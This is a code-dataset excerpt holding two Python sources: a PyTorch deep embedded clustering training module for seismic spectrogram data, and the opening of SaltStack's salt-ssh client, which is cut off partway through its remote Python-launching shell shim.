source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
models.py | #!/usr/bin/env python3
'''Contains necessary functions, routines, and data recording for DEC model
initialization, training, validation, and inference.
William Jenkins, wjenkins [at] ucsd [dot] edu
Scripps Institution of Oceanography, UC San Diego
May 2021
'''
from datetime import datetime
import threading
import os
import shutil
import sys
import matplotlib.pyplot as plt
import numpy as np
np.set_printoptions(threshold=sys.maxsize)
if sys.platform == 'darwin':
from sklearn.cluster import KMeans
from sklearn.manifold import TSNE
elif sys.platform == 'linux':
#CUML requires a gpu
print("warning running CPU version which excludes cuml, will need to install with CUML if using GPU acceleration")
from sklearn.cluster import KMeans
from sklearn.manifold import TSNE
#from cuml import KMeans, TSNE
from sklearn.metrics import silhouette_score
from sklearn.mixture import GaussianMixture
import torch
from torch.utils.data import Dataset, DataLoader
from torch.utils.tensorboard import SummaryWriter
import torchvision
from tqdm import tqdm
from RISCluster import plotting, utils
def pretrain(
        model,
        dataloaders,
        criteria,
        optimizer,
        batch_size,
        lr,
        parameters
):
    '''Pre-trains DEC model (i.e., trains AEC).

    Parameters
    ----------
    model : PyTorch model instance
        Model with untrained parameters
    dataloaders : list of PyTorch dataloader instances
        [training loader, validation loader]; load data from disk into memory.
    criteria : PyTorch loss function instances
        Error metrics; criteria[0] is the MSE reconstruction loss.
    optimizer : PyTorch optimizer instance
    batch_size : int
        Batch size used in calculations
    lr : float
        Controls initial learning rate for gradient descent.
    parameters : dict
        Additional experiment parameters/hyperparameters

    Returns
    -------
    model : PyTorch model instance
        Model with trained parameters

    Outputs to Disk
    ---------------
    Tensorboard Summary Writer : Records training and validation
    Matplotlib Figures : Prints spectrogram reconstructions to disk.
    '''
    tic = datetime.now()
    print('Commencing pre-training...')
    # Unpack experiment parameters:
    n_epochs = parameters['n_epochs']
    show = parameters['show']
    device = parameters['device']
    mode = parameters['mode']
    savepath_exp = parameters['savepath']
    fname_dataset = parameters['fname_dataset']
    early_stopping = parameters['early_stopping']
    patience = parameters['patience']
    km_metrics = parameters['km_metrics']
    # 'img_index' is a comma-separated string of sample indices to display:
    disp_index = [int(i) for i in parameters['img_index'].split(',')]
    tbpid = parameters['tbpid']
    savepath_run, serial_run, savepath_chkpnt = utils.init_output_env(
        savepath_exp,
        mode,
        **{'batch_size': batch_size, 'lr': lr}
    )
    criterion_mse = criteria[0]
    tra_loader = dataloaders[0]
    val_loader = dataloaders[1]
    tb = SummaryWriter(log_dir=savepath_run)
    if tbpid is not None:
        tb.add_text(
            "Tensorboard PID",
            f"To terminate this TB instance, kill PID: {tbpid}",
            global_step=None
        )
    tb.add_text("Path to Saved Outputs", savepath_run, global_step=None)
    # Baseline reconstruction figure before any training:
    fig = plotting.compare_images(
        model,
        0,
        disp_index,
        fname_dataset,
        device,
        T_seg=parameters["T_seg"],
        savepath=savepath_run,
        show=show,
    )
    tb.add_figure('TrainingProgress', fig, global_step=0, close=True)
    if early_stopping:
        # FIX: was a magic value of 10000, which silently broke early stopping
        # whenever the first validation loss exceeded it; inf always works.
        best_val_loss = float('inf')
        # FIX: initialize the no-improvement counter up front instead of the
        # fragile `if epoch == 0` special case inside the loop.
        strikes = 0
    epochs = list()
    tra_losses = list()
    val_losses = list()
    finished = False
    for epoch in range(n_epochs):
        print('-' * 100)
        print(
            f'Epoch [{epoch+1}/{n_epochs}] | '
            f'Batch Size = {batch_size} | LR = {lr}'
        )
        # ==== Training Loop: =================================================
        model.train(True)
        running_tra_mse = 0.0
        running_size = 0
        pbar_tra = tqdm(
            tra_loader,
            leave=True,
            desc=" Training",
            unit="batch",
            postfix={"MSE": "%.6f" % 0.0},
            bar_format='{l_bar}{bar:20}{r_bar}{bar:-20b}'
        )
        for batch in pbar_tra:
            _, batch = batch  # loader yields (index, data); index unused here
            x = batch.to(device)
            optimizer.zero_grad()
            with torch.set_grad_enabled(True):
                x_rec, _ = model(x)
                loss_mse = criterion_mse(x_rec, x)
                loss_mse.backward()
                optimizer.step()
            # Weight batch loss by batch size so the epoch mean is exact:
            running_tra_mse += loss_mse.cpu().detach().numpy() * x.size(0)
            running_size += x.size(0)
            pbar_tra.set_postfix(
                MSE=f"{(running_tra_mse / running_size):.4e}"
            )
        epoch_tra_mse = running_tra_mse / len(tra_loader.dataset)
        tb.add_scalar('Training MSE', epoch_tra_mse, epoch)
        for name, weight in model.named_parameters():
            tb.add_histogram(name, weight, epoch)
            # FIX: frozen/unused parameters have grad=None; guard the call.
            if weight.grad is not None:
                tb.add_histogram(f'{name}.grad', weight.grad, epoch)
        # Periodic reconstruction snapshot (every 5 epochs, skipping epoch 0):
        if (epoch % 5) == 0 and not (epoch == 0):
            fig = plotting.compare_images(
                model,
                epoch,
                disp_index,
                fname_dataset,
                device,
                T_seg=parameters["T_seg"],
                savepath=savepath_run,
                show=show,
            )
            tb.add_figure('TrainingProgress', fig, global_step=epoch, close=True)
        # ==== Validation Loop: ===============================================
        model.train(False)
        model.eval()
        running_val_mse = 0.0
        running_size = 0
        pbar_val = tqdm(
            val_loader,
            leave=True,
            desc="Validation",
            unit="batch",
            postfix={"MSE": "%.6f" % 0.0},
            bar_format='{l_bar}{bar:20}{r_bar}{bar:-20b}'
        )
        for batch in pbar_val:
            _, batch = batch
            x = batch.to(device)
            # FIX: validation needs no autograd graph.
            with torch.no_grad():
                x_rec, _ = model(x)
                loss_mse = criterion_mse(x_rec, x)
            running_val_mse += loss_mse.cpu().detach().numpy() * x.size(0)
            running_size += x.size(0)
            pbar_val.set_postfix(
                MSE=f"{(running_val_mse / running_size):.4e}"
            )
        epoch_val_mse = running_val_mse / len(val_loader.dataset)
        tb.add_scalar('Validation MSE', epoch_val_mse, epoch)
        epochs, tra_losses, val_losses = utils.add_to_history(
            [epochs, tra_losses, val_losses],
            [epoch, epoch_tra_mse, epoch_val_mse]
        )
        if early_stopping:
            if epoch_val_mse < best_val_loss:
                strikes = 0
                best_val_loss = epoch_val_mse
                fname = f'{savepath_chkpnt}/AEC_Best_Weights.pt'
                torch.save(model.state_dict(), fname)
            else:
                strikes += 1
                if epoch > patience and strikes > patience:
                    print('Stopping Early.')
                    finished = True
                    break
        else:
            # No early stopping: checkpoint every epoch.
            fname = f'{savepath_chkpnt}/AEC_Params_{epoch:03d}.pt'
            torch.save(model.state_dict(), fname)
    _ = utils.save_history(
        {
            'Epoch': epochs,
            'Training Loss': tra_losses,
            'Validation Loss': val_losses
        },
        f"{savepath_run}/AEC_history.csv"
    )
    fig2 = plotting.view_history_AEC(f"{savepath_run}/AEC_history.csv")
    fig2.savefig(f"{savepath_run}/AEC_history.png", dpi=300, facecolor='w')
    tb.add_hparams(
        {'Batch Size': batch_size, 'LR': lr},
        {
            'hp/Training MSE': epoch_tra_mse,
            'hp/Validation MSE': epoch_val_mse
        }
    )
    fig = plotting.compare_images(
        model,
        epoch,
        disp_index,
        fname_dataset,
        device,
        T_seg=parameters["T_seg"],
        savepath=savepath_run,
        show=show
    )
    tb.add_figure('TrainingProgress', fig, global_step=epoch, close=True)
    fname = f'{savepath_run}/AEC_Params_Final.pt'
    if early_stopping and (finished or epoch == n_epochs - 1):
        # Promote the best checkpoint to the final weights file.
        src_file = f'{savepath_chkpnt}/AEC_Best_Weights.pt'
        shutil.move(src_file, fname)
    else:
        torch.save(model.state_dict(), fname)
    tb.add_text("Path to Saved Weights", fname, global_step=None)
    print('AEC parameters saved.')
    toc = datetime.now()
    print(f'Pre-training complete at {toc}; time elapsed = {toc-tic}.')
    if km_metrics:
        # 'klist' is "start,stop" (inclusive) for the range of k to evaluate.
        klist = parameters['klist']
        klist = np.arange(int(klist.split(',')[0]), int(klist.split(',')[1]) + 1)
        print('-' * 62)
        print("Calculating optimal cluster size...")
        inertia, silh, gap_g, gap_u = kmeans_metrics(
            tra_loader,
            model,
            device,
            klist
        )
        fig = plotting.view_cluster_stats(klist, inertia, silh, gap_g, gap_u)
        plt.savefig(f'{savepath_run}/KMeans_Metrics.png', dpi=300)
        print("K-means statistics complete; figure saved.")
        tb.add_figure('K-Means Metrics', fig, global_step=None, close=True)
    tb.close()
    return model
def train(
        model,
        dataloader,
        criteria,
        optimizer,
        n_clusters,
        batch_size,
        lr,
        gamma,
        tol,
        index_tra,
        parameters,
        T_seg="4.0"
):
    '''Trains DEC model & performs clustering.

    Parameters
    ----------
    model : PyTorch model instance
        Model with untrained parameters (AEC weights loaded from disk)
    dataloader : PyTorch dataloader instance
        Loads data from disk into memory.
    criteria : PyTorch loss function instances
        criteria[0] is the MSE reconstruction loss, criteria[1] the KLD
        clustering loss.
    optimizer : PyTorch optimizer instance
    n_clusters : int
        Number of clusters
    batch_size : int
        Batch size used in calculations
    lr : float
        Controls initial learning rate for gradient descent.
    gamma : float
        Hyperparameter that controls contribution of clustering loss to total
        loss.
    tol : float
        Threshold at which DEC stops (fraction of samples changing label).
    index_tra : array
        Indeces of data samples to be used for DEC training.
    parameters : dict
        Additional experiment parameters/hyperparameters
    T_seg : str, optional
        Segment length forwarded to the plotting routines.

    Returns
    -------
    model : PyTorch model instance
        Model with trained parameters

    Outputs to Disk
    ---------------
    Tensorboard Summary Writer : Records training and clustering
    Matplotlib Figures : Prints DEC figures to disk.
    '''
    tic = datetime.now()
    print('Commencing training...')
    # Unpack parameters:
    device = parameters['device']
    n_epochs = parameters['n_epochs']
    update_interval = parameters['update_interval']
    savepath_exp = parameters['savepath']
    show = parameters['show']
    mode = parameters['mode']
    loadpath = parameters['saved_weights']
    fname_dataset = parameters['fname_dataset']
    tbpid = parameters['tbpid']
    init = parameters['init']
    savepath_run, serial_run = utils.init_output_env(
        savepath_exp,
        mode,
        **{
            'n_clusters': n_clusters,
            'batch_size': batch_size,
            'lr': lr,
            'gamma': gamma,
            'tol': tol
        }
    )
    fignames = [
        'T-SNE',
        'Gallery',
        'DistMatrix',
        'LatentSpace',
        'CDF',
        'PDF'
    ]
    figpaths = [utils.make_dir(name, savepath_run) for name in fignames]
    # Load pre-trained AEC weights; strict=False because the clustering layer
    # is new and absent from the checkpoint.
    model.load_state_dict(
        torch.load(loadpath, map_location=device), strict=False
    )
    model.eval()
    criterion_mse = criteria[0]
    criterion_kld = criteria[1]
    M = len(dataloader.dataset)
    if update_interval == -1:
        # Default: refresh the target distribution twice per epoch.
        update_interval = int(np.ceil(M / (batch_size * 2)))
    tb = SummaryWriter(log_dir=savepath_run)
    if tbpid is not None:
        tb.add_text(
            "Tensorboard PID",
            f"To terminate this TB instance, kill PID: {tbpid}",
            global_step=None
        )
    tb.add_text("Path to Saved Outputs", savepath_run, global_step=None)
    # Initialize Clusters:
    if init == "kmeans":
        print('Initiating clusters with k-means...', end="", flush=True)
        labels_prev, centroids = kmeans(model, dataloader, device)
    elif init == "gmm":
        print('Initiating clusters with GMM...', end="", flush=True)
        labels_prev, centroids = gmm(model, dataloader, device)
    else:
        # BUG FIX: an unrecognized init silently left labels_prev/centroids
        # undefined and crashed later with a NameError; fail loudly instead.
        raise ValueError(f"Unknown initialization method: {init}")
    cluster_centers = torch.from_numpy(centroids).to(device)
    with torch.no_grad():
        # state_dict() tensors alias the parameters, so copy_ seeds the layer.
        model.state_dict()["clustering.weights"].copy_(cluster_centers)
    fname = f'{savepath_run}/DEC_Params_Initial.pt'
    torch.save(model.state_dict(), fname)
    print('complete.')
    # Initialize Target Distribution:
    q, _, z_array0 = infer(dataloader, model, device)
    p = target_distribution(q)
    # BUG FIX: guarantee `labels` is bound even if the periodic update below
    # never runs before the first plotting epoch.
    labels = labels_prev
    epoch = 0
    tsne_results = tsne(z_array0)
    plotargs = (
        fignames,
        figpaths,
        tb,
        model,
        dataloader,
        device,
        fname_dataset,
        index_tra,
        z_array0,
        z_array0,
        labels_prev,
        labels_prev,
        centroids,
        centroids,
        tsne_results,
        epoch,
        show,
        T_seg
    )
    # Plotting is slow; run it off the training thread.
    plot_process = threading.Thread(target=plotting.plotter_mp, args=plotargs)
    plot_process.start()
    iters = list()
    rec_losses = list()
    clust_losses = list()
    total_losses = list()
    deltas_iter = list()
    deltas = list()
    n_iter = 1
    finished = False
    for epoch in range(n_epochs):
        print('-' * 110)
        print(
            f'Epoch [{epoch+1}/{n_epochs}] | '
            f'# Clusters = {n_clusters} | '
            f'Batch Size = {batch_size} | '
            f'LR = {lr} | '
            f'gamma = {gamma} | '
            f'tol = {tol}'
        )
        running_loss = 0.0
        running_loss_rec = 0.0
        running_loss_clust = 0.0
        running_size = 0
        pbar = tqdm(
            dataloader,
            leave=True,
            unit="batch",
            postfix={
                "MSE": "%.6f" % 0.0,
                "KLD": "%.6f" % 0.0,
                "Loss": "%.6f" % 0.0
            },
            bar_format='{l_bar}{bar:20}{r_bar}{bar:-20b}'
        )
        # Iterate over data:
        for batch_num, batch in enumerate(pbar):
            _, batch = batch
            x = batch.to(device)
            # Periodically update the target distribution and check the stop
            # criterion (skipped on the very first batch of the first epoch):
            if (batch_num % update_interval == 0) and not \
                    (batch_num == 0 and epoch == 0):
                q, labels, _ = infer(dataloader, model, device)
                p = target_distribution(q)
                # Fraction of samples whose assignment changed:
                delta_label = np.sum(labels != labels_prev).astype(np.float32)\
                    / labels.shape[0]
                deltas_iter, deltas = utils.add_to_history(
                    [deltas_iter, deltas],
                    [n_iter, delta_label]
                )
                tb.add_scalar('delta', delta_label, n_iter)
                labels_prev = np.copy(labels)
                if delta_label < tol:
                    print('Stop criterion met, training complete.')
                    finished = True
                    break
            # Slice of the target distribution aligned with this batch:
            tar_dist = p[running_size:(running_size + x.size(0)), :]
            tar_dist = torch.from_numpy(tar_dist).to(device)
            model.train()
            optimizer.zero_grad()
            with torch.set_grad_enabled(True):
                q, x_rec, _ = model(x)
                loss_rec = criterion_mse(x_rec, x)
                loss_clust = gamma * criterion_kld(torch.log(q), tar_dist) \
                    / x.size(0)
                loss = loss_rec + loss_clust
                loss.backward()
                optimizer.step()
            running_size += x.size(0)
            running_loss += loss.detach().cpu().numpy() * x.size(0)
            running_loss_rec += loss_rec.detach().cpu().numpy() * x.size(0)
            running_loss_clust += loss_clust.detach().cpu().numpy() * x.size(0)
            accum_loss = running_loss / running_size
            accum_loss_rec = running_loss_rec / running_size
            accum_loss_clust = running_loss_clust / running_size
            pbar.set_postfix(
                MSE=f"{accum_loss_rec:.4e}",
                KLD=f"{accum_loss_clust:.4e}",
                Loss=f"{accum_loss:.4e}"
            )
            iters, rec_losses, clust_losses, total_losses = \
                utils.add_to_history(
                    [iters, rec_losses, clust_losses, total_losses],
                    [n_iter, accum_loss_rec, accum_loss_clust, accum_loss]
                )
            tb.add_scalars(
                'Losses',
                {
                    'Loss': accum_loss,
                    'MSE': accum_loss_rec,
                    'KLD': accum_loss_clust
                },
                n_iter
            )
            tb.add_scalar('Loss', accum_loss, n_iter)
            tb.add_scalar('MSE', accum_loss_rec, n_iter)
            tb.add_scalar('KLD', accum_loss_clust, n_iter)
            for name, weight in model.named_parameters():
                tb.add_histogram(name, weight, n_iter)
                # FIX: frozen/unused parameters have grad=None; guard the call.
                if weight.grad is not None:
                    tb.add_histogram(f'{name}.grad', weight.grad, n_iter)
            n_iter += 1
        # Epoch-level snapshot of the latent space (every 4 epochs, or once
        # more when the stop criterion fired):
        if ((epoch % 4 == 0) and not (epoch == 0)) or finished:
            _, _, z_array1 = infer(dataloader, model, device)
            tsne_results = tsne(z_array1)
            plotargs = (
                fignames,
                figpaths,
                tb,
                model,
                dataloader,
                device,
                fname_dataset,
                index_tra,
                z_array0,
                z_array1,
                labels_prev,
                labels,
                centroids,
                model.clustering.weights.detach().cpu().numpy(),
                tsne_results,
                epoch,
                show,
                T_seg
            )
            plot_process = threading.Thread(
                target=plotting.plotter_mp,
                args=plotargs
            )
            plot_process.start()
        if finished:
            break
    _ = utils.save_history(
        {
            'Iteration': iters,
            'Reconstruction Loss': rec_losses,
            'Clustering Loss': clust_losses,
            'Total Loss': total_losses
        },
        f"{savepath_run}/DEC_history.csv"
    )
    _ = utils.save_history(
        {
            'Iteration': deltas_iter,
            'Delta': deltas
        },
        f"{savepath_run}/Delta_history.csv"
    )
    tb.add_hparams(
        {
            'Clusters': n_clusters,
            'Batch Size': batch_size,
            'LR': lr,
            'gamma': gamma,
            'tol': tol},
        {
            'hp/MSE': accum_loss_rec,
            'hp/KLD': accum_loss_clust,
            'hp/Loss': accum_loss
        }
    )
    fname = f'{savepath_run}/DEC_Params_Final.pt'
    torch.save(model.state_dict(), fname)
    tb.add_text("Path to Saved Weights", fname, global_step=None)
    tb.close()
    print('DEC parameters saved.')
    toc = datetime.now()
    # BUG FIX: message said "Pre-training complete" (copy-paste from pretrain).
    print(f'Training complete at {toc}; time elapsed = {toc-tic}.')
    return model
def predict(model, dataloader, parameters):
    '''Run DEC model in inference mode.

    Parameters
    ----------
    model : PyTorch model instance
        Model with trained parameters
    dataloader : PyTorch dataloader instance
        Loads data from disk into memory; yields (index, data) pairs.
    parameters : dict
        Additional experiment parameters/hyperparameters; must contain
        'device' and 'saved_weights'.

    Outputs to Disk
    ---------------
    Catalogue of class labels for each data sample, written next to the
    saved-weights file.
    '''
    device = parameters['device']
    loadpath = parameters['saved_weights']
    # Labels are saved alongside the weights they were produced with:
    savepath = os.path.dirname(loadpath)
    model.load_state_dict(torch.load(loadpath, map_location=device))
    model.eval()
    pbar = tqdm(
        dataloader,
        leave=True,
        desc="Saving cluster labels",
        unit="batch",
        bar_format='{l_bar}{bar:20}{r_bar}{bar:-20b}'
    )
    for batch in pbar:
        idx, batch = batch
        x = batch.to(device)
        # FIX: inference needs no autograd graph; avoids wasted memory.
        with torch.no_grad():
            _, labels, _ = model(x)
        # FIX: build the records directly instead of building dicts and then
        # re-filtering them for the same two keys.
        utils.save_labels(
            [{
                'idx': idx[i].cpu().detach().numpy(),
                'label': labels[i].cpu().detach().numpy()
            } for i in range(x.size(0))],
            savepath
        )
def kmeans(model, dataloader, device):
    '''Initiate clusters using k-means algorithm.

    Parameters
    ----------
    model : PyTorch model instance
    dataloader : PyTorch dataloader instance
        Loads data from disk into memory.
    device : PyTorch device object ('cpu' or 'gpu')

    Returns
    -------
    labels : array (M,)
        Sample-wise cluster assignment
    centroids : array (n_clusters,)
        Cluster centroids
    '''
    # Embed the full dataset into latent space, then cluster the embeddings.
    _, _, latent = infer(dataloader, model, device)
    estimator = KMeans(
        n_clusters=model.n_clusters,
        max_iter=1000,
        n_init=100,
        random_state=2009
    )
    estimator.fit(latent)
    return estimator.labels_, estimator.cluster_centers_
def gmm(model, dataloader, device):
    '''Initiate clusters using Gaussian mixtures model algorithm.

    K-means provides the initial responsibilities; a GMM then refines the
    assignment via EM, seeded with the k-means centroids and the empirical
    cluster fractions.

    Parameters
    ----------
    model : PyTorch model instance
    dataloader : PyTorch dataloader instance
        Loads data from disk into memory.
    device : PyTorch device object ('cpu' or 'gpu')

    Returns
    -------
    labels : array (M,)
        Sample-wise cluster assignment
    centroids : array (n_clusters,)
        Cluster centroids (GMM means)
    '''
    M = len(dataloader.dataset)
    _, _, z_array = infer(dataloader, model, device)
    # Initialize w/ K-Means:
    km = KMeans(
        n_clusters=model.n_clusters,
        max_iter=1000,
        n_init=100,
        random_state=2009
    )
    km.fit(z_array)
    centroids = km.cluster_centers_
    # FIX: the original overwrote `labels` with the array of *unique* label
    # values and built the weights in a Python loop; compute the empirical
    # cluster fractions directly instead.
    _, counts = np.unique(km.labels_, return_counts=True)
    gmm_weights = counts / M
    # Perform EM:
    GMM = GaussianMixture(
        n_components=model.n_clusters,
        max_iter=1000,
        n_init=1,
        weights_init=gmm_weights,
        means_init=centroids
    )
    # EM responsibilities can underflow harmlessly; silence those warnings.
    np.seterr(under='ignore')
    labels = GMM.fit_predict(z_array)
    centroids = GMM.means_
    return labels, centroids
def tsne(data):
    '''Perform t-SNE on data.

    Parameters
    ----------
    data : array (M,N)
        Latent-space samples (m_samples, n_features).

    Returns
    -------
    results : array (M,2)
        2-D t-SNE embedding
    '''
    print('Running t-SNE...', end="", flush=True)
    M = len(data)
    np.seterr(under='warn')
    # FIX: int(M/100) and int(M/12) are 0 for small datasets, which are
    # invalid values for perplexity/learning_rate; floor them at sane minima.
    # Behavior is unchanged for the dataset sizes where this already worked.
    results = TSNE(
        n_components=2,
        perplexity=max(int(M / 100), 5),
        early_exaggeration=20,
        learning_rate=max(int(M / 12), 10),
        n_iter=2000,
        verbose=0,
        random_state=2009
    ).fit_transform(data.astype('float64'))
    print('complete.')
    return results
def infer(dataloader, model, device, v=False):
    '''Run DEC/AEC model in inference mode over an entire dataloader.

    Parameters
    ----------
    dataloader : PyTorch dataloader instance
        Loads data from disk into memory. If the model has a clustering layer
        it must yield (index, data) pairs; otherwise plain tensors.
    model : PyTorch model instance
        Model with trained parameters
    device : PyTorch device object ('cpu' or 'gpu')
    v : Boolean (default=False)
        Verbose mode (kept for API compatibility; progress bar is disabled).

    Returns
    -------
    If the model has a clustering layer (``n_clusters`` attribute):
    q_array : array (M, n_clusters)
        Soft cluster assignments, rounded to 5 decimals
    labels : array (M,)
        Hard cluster assignments (argmax of q)
    z_array : array (M,D)
        Latent space data (m_samples, d_features)
    Otherwise only ``z_array`` is returned.
    '''
    # A model with an `n_clusters` attribute is the full DEC model and
    # returns (q, x_rec, z); the plain AEC returns (x_rec, z).
    cflag = hasattr(model, 'n_clusters')
    model.eval()
    bsz = dataloader.batch_size
    n_samples = len(dataloader.dataset)
    z_array = np.zeros((n_samples, model.clustering.n_features), dtype=np.float32)
    # FIX: run under no_grad; the original built an autograd graph for every
    # batch during pure inference.
    with torch.no_grad():
        if cflag:
            q_array = np.zeros((n_samples, model.n_clusters), dtype=np.float32)
            for b, batch in enumerate(dataloader):
                _, batch = batch
                x = batch.to(device)
                q, _, z = model(x)
                q_array[b * bsz:(b * bsz) + x.size(0), :] = q.detach().cpu().numpy()
                z_array[b * bsz:(b * bsz) + x.size(0), :] = z.detach().cpu().numpy()
            labels = np.argmax(q_array, axis=1)
            return np.round(q_array, 5), labels, z_array
        for b, batch in enumerate(dataloader):
            x = batch.to(device)
            _, z = model(x)
            z_array[b * bsz:(b * bsz) + x.size(0), :] = z.detach().cpu().numpy()
        return z_array
def target_distribution(q):
    '''From Xie/Girshick/Farhadi (2016). Computes the target distribution p,
    given soft assignements, q. The target distribtuion is generated by giving
    more weight to 'high confidence' samples - those with a higher probability
    of being a signed to a certain cluster. This is used in the KL-divergence
    loss function.

    Parameters
    ----------
    q : array (M,D)
        Soft assignement probabilities - Probabilities of each sample being
        assigned to each cluster [n_samples, n_features]

    Returns
    -------
    p : array (M,D)
        Auxiliary target distribution of shape [n_samples, n_features].
    '''
    # Square the assignments and normalize by per-cluster frequency, ...
    weight = (q ** 2) / q.sum(axis=0)
    # ... then renormalize each row so every sample sums to 1.
    p = (weight.T / weight.sum(axis=1)).T
    return np.round(p, 5)
def kmeans_metrics(dataloader, model, device, k_list):
    '''Run statistical evaluation on k-means over a range of cluster numbers.

    Calculates inertia, gap statistic (uniform and Gaussian), and silhouette
    score.

    Parameters
    ----------
    dataloader : PyTorch dataloader instance
        Loads data from disk into memory.
    model : PyTorch model instance
        Model with trained parameters
    device : PyTorch device object ('cpu' or 'gpu')
    k_list : array or list
        List of numbers of clusters to evaluate.

    Returns
    -------
    inertia : array
        k-means inertia for each k
    silh : array
        k-means silhouette score for each k
    gap_g : array
        gap statistic against a Gaussian reference distribution
    gap_u : array
        gap statistic against a uniform reference distribution
    '''
    _, _, z_array = infer(dataloader, model, device)
    # Per-feature statistics of the latent space, used to build the two
    # reference distributions for the gap statistic.
    feat_min = np.min(z_array, axis=0)
    feat_max = np.max(z_array, axis=0)
    feat_mean = np.mean(z_array, axis=0)
    feat_std = np.std(z_array, axis=0)
    gauss = np.zeros((z_array.shape[0], z_array.shape[1]))
    unifo = np.zeros((z_array.shape[0], z_array.shape[1]))
    for i in range(z_array.shape[1]):
        # BUG FIX: the Gaussian reference was drawn with loc=feat_min[i]
        # even though feat_mean was computed and never used; a Gaussian
        # reference should match the data's mean and std.
        gauss[:, i] = np.random.normal(
            loc=feat_mean[i],
            scale=feat_std[i],
            size=z_array.shape[0]
        )
        unifo[:, i] = np.random.uniform(
            low=feat_min[i],
            high=feat_max[i],
            size=z_array.shape[0]
        )
    inertia = np.zeros(len(k_list))
    inertiag = np.zeros(len(k_list))
    inertiau = np.zeros(len(k_list))
    silh = np.zeros(len(k_list))
    pbar = tqdm(
        k_list,
        bar_format='{l_bar}{bar:20}{r_bar}{bar:-20b}',
        desc='Calculating k-means statistics'
    )
    for i, k in enumerate(pbar):
        # k-means/silhouette occasionally fail; retry a bounded number of
        # times (was a bare `except:` with a hand-rolled attempt counter).
        for attempt in range(6):
            try:
                km = KMeans(n_clusters=k, n_init=100).fit(z_array)
                kmg = KMeans(n_clusters=k, n_init=100).fit(gauss)
                kmu = KMeans(n_clusters=k, n_init=100).fit(unifo)
                inertia[i] = km.inertia_
                inertiag[i] = kmg.inertia_
                inertiau[i] = kmu.inertia_
                silh[i] = silhouette_score(z_array, km.labels_)
                break
            except Exception:
                continue
    gap_g = np.log(inertiag) - np.log(inertia)
    gap_u = np.log(inertiau) - np.log(inertia)
    return inertia, silh, gap_g, gap_u
|
__init__.py | # -*- coding: utf-8 -*-
"""
Create ssh executor system
"""
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import base64
import binascii
import copy
import datetime
import getpass
import hashlib
import logging
import multiprocessing
import os
import re
import subprocess
import sys
import tarfile
import tempfile
import time
import uuid
import salt.client.ssh.shell
import salt.client.ssh.wrapper
import salt.config
import salt.defaults.exitcodes
import salt.exceptions
import salt.loader
import salt.log
import salt.minion
# Import salt libs
import salt.output
import salt.roster
import salt.serializers.yaml
import salt.state
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.event
import salt.utils.files
import salt.utils.hashutils
import salt.utils.json
import salt.utils.network
import salt.utils.path
import salt.utils.stringutils
import salt.utils.thin
import salt.utils.url
import salt.utils.verify
# Import 3rd-party libs
from salt.ext import six
from salt.ext.six.moves import input # pylint: disable=import-error,redefined-builtin
from salt.template import compile_template
from salt.utils.platform import is_windows
from salt.utils.process import Process
from salt.utils.zeromq import zmq
try:
import saltwinshell
HAS_WINSHELL = True
except ImportError:
HAS_WINSHELL = False
# The directory where salt thin is deployed
DEFAULT_THIN_DIR = "/var/tmp/.%%USER%%_%%FQDNUUID%%_salt"
# RSTR is just a delimiter to distinguish the beginning of salt STDOUT
# and STDERR. There is no special meaning. Messages prior to RSTR in
# stderr and stdout are either from SSH or from the shim.
#
# RSTR on both stdout and stderr:
# no errors in SHIM - output after RSTR is from salt
# No RSTR in stderr, RSTR in stdout:
# no errors in SSH_SH_SHIM, but SHIM commands for salt master are after
# RSTR in stdout
# No RSTR in stderr, no RSTR in stdout:
# Failure in SHIM
# RSTR in stderr, No RSTR in stdout:
# Undefined behavior
RSTR = "_edbc7885e4f9aac9b83b35999b68d015148caf467b78fa39c05f669c0ff89878"
# The regex to find RSTR in output - Must be on an output line by itself
# NOTE - must use non-grouping match groups or output splitting will fail.
RSTR_RE = r"(?:^|\r?\n)" + RSTR + r"(?:\r?\n|$)"
# METHODOLOGY:
#
# 1) Make the _thinnest_ /bin/sh shim (SSH_SH_SHIM) to find the python
# interpreter and get it invoked
# 2) Once a qualified python is found start it with the SSH_PY_SHIM
# 3) The shim is converted to a single semicolon separated line, so
# some constructs are needed to keep it clean.
# NOTE:
# * SSH_SH_SHIM is generic and can be used to load+exec *any* python
# script on the target.
# * SSH_PY_SHIM is in a separate file rather than stuffed in a string
# in salt/client/ssh/__init__.py - this makes testing *easy* because
# it can be invoked directly.
# * SSH_PY_SHIM is base64 encoded and formatted into the SSH_SH_SHIM
# string. This makes the python script "armored" so that it can
# all be passed in the SSH command and will not need special quoting
# (which likely would be impossibe to do anyway)
# * The formatted SSH_SH_SHIM with the SSH_PY_SHIM payload is a bit
# big (~7.5k). If this proves problematic for an SSH command we
# might try simply invoking "/bin/sh -s" and passing the formatted
# SSH_SH_SHIM on SSH stdin.
# NOTE: there are two passes of formatting:
# 1) Substitute in static values
# - EX_THIN_PYTHON_INVALID - exit code if a suitable python is not found
# 2) Substitute in instance-specific commands
# - DEBUG - enable shim debugging (any non-zero string enables)
# - SUDO - load python and execute as root (any non-zero string enables)
# - SSH_PY_CODE - base64-encoded python code to execute
# - SSH_PY_ARGS - arguments to pass to python code
# This shim generically loads python code . . . and *no* more.
# - Uses /bin/sh for maximum compatibility - then jumps to
# python for ultra-maximum compatibility.
#
# 1. Identify a suitable python
# 2. Jump to python
# Note the list-comprehension syntax to define SSH_SH_SHIM is needed
# to be able to define the string with indentation for readability but
# still strip the white space for compactness and to avoid issues with
# some multi-line embedded python code having indentation errors
# NOTE: every line of the raw shell string below is stripped (s.strip()),
# so the shim's indentation is purely cosmetic; double braces survive the
# .format() pass here and are filled in per-invocation later.
SSH_SH_SHIM = "\n".join(
    [
        s.strip()
        for s in r'''/bin/sh << 'EOF'
set -e
set -u
DEBUG="{{DEBUG}}"
if [ -n "$DEBUG" ]
then set -x
fi
SET_PATH="{{SET_PATH}}"
if [ -n "$SET_PATH" ]
then export PATH={{SET_PATH}}
fi
SUDO=""
if [ -n "{{SUDO}}" ]
then SUDO="sudo "
fi
SUDO_USER="{{SUDO_USER}}"
if [ "$SUDO" ] && [ "$SUDO_USER" ]
then SUDO="sudo -u {{SUDO_USER}}"
elif [ "$SUDO" ] && [ -n "$SUDO_USER" ]
then SUDO="sudo "
fi
EX_PYTHON_INVALID={EX_THIN_PYTHON_INVALID}
PYTHON_CMDS="python3 python27 python2.7 python26 python2.6 python2 python"
for py_cmd in $PYTHON_CMDS
do
if command -v "$py_cmd" >/dev/null 2>&1 && "$py_cmd" -c "import sys; sys.exit(not (sys.version_info >= (2, 6)));"
then
